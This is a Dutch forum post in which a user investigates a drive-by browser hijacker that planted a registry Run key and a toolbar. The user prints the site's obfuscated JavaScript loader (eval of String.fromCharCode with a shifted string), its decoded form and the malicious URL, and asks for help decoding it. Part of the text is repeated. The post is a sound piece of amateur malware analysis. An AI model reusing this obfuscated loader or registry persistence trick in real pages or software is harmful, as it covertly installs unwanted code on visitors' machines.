Onlangs werd ik na het bezoeken van een website automatisch gelinkt naar een
andere website, dat m'n IE op een sneaky manier heeft veranderd door een
stomme search bar te installeren. Ik realiseerde mij dit pas, nadat ik de volgende
dag m'n computer had opgestart. De registry was natuurlijk meteen de plek waar
ik als eerste op onderzoek ging.
Bij HLMSOFTWAREMicrosoftWindowsCurrentVersionRun zag ik de
Value name SystemSearch met Value data REGEDIT.EXE -s C:ie.reg staan.
Aha, dus even in de C: directory gekeken en jawel..daar zat de registry file ie.reg
Verdomd, hoe heeft men dit nou weer geflikt?!
Om een lang verhaal kort te houden. Ik heb ontdekt dat de volgende PHP pagina
deze registry key en file heeft geplaatst: zzz.hotsearchbox.com/x/count.php (bezoeken op eigen risico
)
Aangezien het een PHP script betreft, zou je denken dat je de source niet kunt zien.
Toch wel, door de pagina naar je e-mail adres te sturen en zo de source te bekijken
Dit is (blijkbaar) de encrypted source:
[F_J_Kedit: enter na += en na rjr$ gezet, die horen er niet. Idem enters en spaties gezet in de cijferlijsten]
De inhoud na String.fromCharCode heb ik op de volgende manier kunnen achterhalen:
Wat de volgende uitkomst gaf:
Ik heb alleen niet via Google kunnen vinden hoe ik het eerste gekrabbel kan decoderen.
Vandaar dat ik mij dus tot jullie wend.
Wie o wie kan mij helpen om dit mysterie op te lossen?
Bij voorbaat dank!
andere website, dat m'n IE op een sneaky manier heeft veranderd door een
stomme search bar te installeren. Ik realiseerde mij dit pas, nadat ik de volgende
dag m'n computer had opgestart. De registry was natuurlijk meteen de plek waar
ik als eerste op onderzoek ging.
Bij HLMSOFTWAREMicrosoftWindowsCurrentVersionRun zag ik de
Value name SystemSearch met Value data REGEDIT.EXE -s C:ie.reg staan.
Aha, dus even in de C: directory gekeken en jawel..daar zat de registry file ie.reg
Verdomd, hoe heeft men dit nou weer geflikt?!
Om een lang verhaal kort te houden. Ik heb ontdekt dat de volgende PHP pagina
deze registry key en file heeft geplaatst: zzz.hotsearchbox.com/x/count.php (bezoeken op eigen risico
Aangezien het een PHP script betreft, zou je denken dat je de source niet kunt zien.
Toch wel, door de pagina naar je e-mail adres te sturen en zo de source te bekijken
Dit is (blijkbaar) de encrypted source:
var h=0;var q='';var str=">uetkrv@xct"q?ykpfqy0etgcvgRqrwr*+=
hwpevkqp"u*+}q0fqewogpv0dqf{0kppgtJVON"?")>qdlgev"fcvc?$1z1eqwpv40rjr$
@=q0ujqy*2.2.3.3.fqewogpv0dqf+=�u*+=>1uetkrv@";
eval(String.fromCharCode(119,104,105,108,101,32,40,104,60,
115,116,114,46,108,101,110,103,116,104,41,123,13,10,113,32,
43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,
97,114,67,111,100,101,40,115,116,114,46,99,104,97,114,67,
111,100,101,65,116,40,104,41,45,50,41,59,13,10,104,43,43,
59,13,10,125,13,10,100,111,99,117,109,101,110,116,46,119,
114,105,116,101,40,113,41,59))
[F_J_Kedit: enter na += en na rjr$ gezet, die horen er niet. Idem enters en spaties gezet in de cijferlijsten]
De inhoud na String.fromCharCode heb ik op de volgende manier kunnen achterhalen:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Zim Zala Bim</title>
<META http-equiv=Content-Type content="text/html; charset=windows-1252"></head>
<BODY>
<script language="JavaScript">
var Str=String.fromCharCode(119,104,105,108,101,32,40,
104,60,115,116,114,46,108,101,110,103,116,104,41,123,
13,10,113,32,43,61,32,83,116,114,105,110,103,46,102,
114,111,109,67,104,97,114,67,111,100,101,40,115,116,
114,46,99,104,97,114,67,111,100,101,65,116,40,104,41,
45,50,41,59,13,10,104,43,43,59,13,10,125,13,10,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,113,41,59);
alert(Str);
</script>
</body>
</html>
Wat de volgende uitkomst gaf:
code:
1
2
3
4
5
| while (h<str.length){
q += String.fromCharCode(str.charCodeAt(h)-2);
h++;
}
document.write(q); |
Ik heb alleen niet via Google kunnen vinden hoe ik het eerste gekrabbel kan decoderen.
Vandaar dat ik mij dus tot jullie wend.
Wie o wie kan mij helpen om dit mysterie op te lossen?
Bij voorbaat dank!
[ Voor 29% gewijzigd door F_J_K op 23-10-2003 15:54 . Reden: en weer layout aangepast :* ]